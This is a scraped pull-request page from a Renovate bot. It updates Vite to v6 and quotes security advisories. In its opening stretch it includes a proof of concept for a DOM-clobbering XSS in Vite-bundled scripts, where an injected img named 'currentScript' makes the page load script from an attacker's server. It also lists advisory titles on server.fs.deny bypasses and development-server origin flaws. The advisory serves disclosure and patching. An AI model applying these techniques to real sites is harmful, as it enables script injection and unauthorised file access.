relativeUrlMechanisms = { amd: (relativePath) => { if (relativePath[0] !== ".") relativePath = "./" + relativePath; return getResolveUrl( `require.toUrl('${escapeId(relativePath)}'), document.baseURI` ); }, cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath( relativePath )} : ${getRelativeUrlFromDocument(relativePath)})`, es: (relativePath) => getResolveUrl( `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url` ), iife: (relativePath) => getRelativeUrlFromDocument(relativePath), // NOTE: make sure rollup generate `module` params system: (relativePath) => getResolveUrl( `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url` ), umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath( relativePath )} : ${getRelativeUrlFromDocument(relativePath, true)})` }; ``` ##### PoC Considering a website that contains the following `main.js` script, the devloper decides to use the Vite to bundle up the program with the following configuration. ``` // main.js import extraURL from './extra.js?url' var s = document.createElement('script') s.src = extraURL document.head.append(s) ``` ``` // extra.js export default "https://myserver/justAnOther.js" ``` ``` // vite.config.js import { defineConfig } from 'vite' export default defineConfig({ build: { assetsInlineLimit: 0, // To avoid inline assets for PoC rollupOptions: { output: { format: "cjs" }, }, }, base: "./", }); ``` After running the build command, the developer will get following bundle as the output. ``` // dist/index-DDmIg9VD.js "use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e); ``` Adding the Vite bundled script, `dist/index-DDmIg9VD.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server`. The attacker only needs to insert an `img` tag with the `name` attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page. ``` <!DOCTYPE html> <html> <head> <title>Vite Example</title> If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://github.com/renovatebot/renovate).

renovate added 1 commit 2026-05-20 09:36:30 +00:00

Update dependency vite to v6 [SECURITY]

ci / build_and_publish (pull_request) Successful in 36s

Details

ba2f1f3c28

ci / build_and_publish (pull_request) Successful in 36s

Details

This pull request has changes conflicting with the target branch.

yarn.lock

View command line instructions

Checkout

From your project repository, check out a new branch and test the changes.

git fetch -u origin renovate/npm-vite-vulnerability:renovate/npm-vite-vulnerability

git checkout renovate/npm-vite-vulnerability

Merge

Merge the changes and update on Forgejo.

Warning: The "Autodetect manual merge" setting is not enabled for this repository, you will have to mark this pull request as manually merged afterwards.

git checkout main

git merge --no-ff renovate/npm-vite-vulnerability

git checkout renovate/npm-vite-vulnerability

git rebase main

git checkout main

git merge --ff-only renovate/npm-vite-vulnerability

git checkout renovate/npm-vite-vulnerability

git rebase main

git checkout main

git merge --no-ff renovate/npm-vite-vulnerability

git checkout main

git merge --squash renovate/npm-vite-vulnerability

git checkout main

git merge --ff-only renovate/npm-vite-vulnerability

git checkout main

git merge renovate/npm-vite-vulnerability

git push origin main

No reviewers

No labels

No milestone

No project

No assignees

1 participant

Notifications

Due date

The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference: sr2/keycloak-theme-cloud#7

No description provided.

Rows
Columns

Update dependency vite to v6 [SECURITY] #7

Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS

Details

Summary

Details

PoC

Impact

Patch

Severity

References

Vite's server.fs.deny is bypassed when using ?import&raw

Details

Summary

Details

PoC

Severity

References

Websites were able to send any requests to the development server and read the response in vite

Details

Summary

Upgrade Path

Using the backend integration feature

Using a reverse proxy in front of Vite

Accessing the development server via a domain other than localhost or *.localhost

Using a plugin / framework that connects to the WebSocket server on their own from the browser

Mitigation without upgrading Vite

[1]: Permissive default CORS settings

[2]: Lack of validation on the Origin header for WebSocket connections

[3]: Lack of validation on the Host header for HTTP requests

Details

[1]: Permissive default CORS settings

[2]: Lack of validation on the Origin header for WebSocket connections

[3]: Lack of validation on the Host header for HTTP requests

Impact

[1]: Permissive default CORS settings

[2]: Lack of validation on the Origin header for WebSocket connections

[3]: Lack of validation on the Host header for HTTP requests

Related Information

PoC

[2]: Lack of validation on the Origin header for WebSocket connections

Severity

References

Vite bypasses server.fs.deny when using ?raw??

Details

Summary

Impact

Details

PoC

Severity

References

Vite has a server.fs.deny bypassed for inline and raw with ?import query

Details

Summary

Impact

Details

PoC

Severity

References

Vite allows server.fs.deny to be bypassed with .svg or relative paths

Details

Summary

Impact

Details

.svg

relative paths

PoC

Severity

References

Vite has an server.fs.deny bypass with an invalid request-target

Details

Summary

Impact

Details

PoC

Severity

References

Vite's server.fs.deny bypassed with /. for files under project root

Details

Summary

Impact

Vite's `server.fs.deny` is bypassed when using `?import&raw`

Accessing the development server via a domain other than `localhost` or `*.localhost`

Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query

`.svg`

Vite has an `server.fs.deny` bypass with an invalid `request-target`

Vite's `server.fs` settings were not applied to HTML files

Vite Vulnerable to Path Traversal in Optimized Deps `.map` Handling